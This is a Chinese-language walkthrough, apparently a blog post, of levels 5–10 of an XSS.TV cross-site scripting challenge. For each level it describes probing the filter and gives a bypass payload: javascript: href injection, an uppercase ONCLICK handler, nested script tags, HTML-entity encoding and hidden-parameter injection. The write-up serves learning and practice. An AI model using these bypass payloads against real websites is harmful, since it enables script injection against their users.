XSS.TV挑戰賽(二)

0x5 Level5

老樣子,還是先看看過濾了什麼。

看起來script被直接插了一個下劃線,那試試添加屬性

結果也被加了下劃線,再試試expression

那再試試href吧

意外的直接過了。

payload:"><a href=javascript:alert();>

0x6 Level6

依舊是看看過濾了什麼

感覺跟上題類似,再試試href

href掛了再試試src

emmmmm(這裡經過多次嘗試後),最後發現大寫沒有過濾

payload:" ONCLICK=alert()%0a

0x7 Level7

依舊是看看過濾了什麼

這裡搜索框內的script被過濾後刪掉了,那就簡單了

payload:"><scriscriptpt>alert()</scriscriptpt>

0x8 Level8

依舊是簡單的測試

試試引號

雙引號也被轉碼了,既然在字元串內,那試試十六進位轉碼唄

完美。

payload:&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x29;

0x9 Level9

觀察一番,發現原來是不合法的鏈接不會顯示

所以嘗試一下過濾規則

看起來只是看有沒有http而已,那就不客氣了

payload:javascript:alert();//http://

0xA Level10

依舊是掃一眼HTML

其中keyword被完全過濾了,百思不得其解,最後沒忍住搜了下答案

emmmmm,原來那個隱藏的input的value可以通過接收一個t_sort參數修改。

payload:" onclick=alert(0) type="submit"

上期:XSS.TV挑戰賽(一)


推薦閱讀:

教大家如何找XSS漏洞並且利用
QQ空間自動發說說還能@好友是怎麼回事?
存儲型XSS與反射型XSS有什麼區別?
DOM-based XSS 與存儲性 XSS、反射型 XSS 有什麼區別?
XSS 攻擊時怎麼繞過 htmlspecialchars 函數呢?

TAG:XSS | CTFCaptureTheFlag |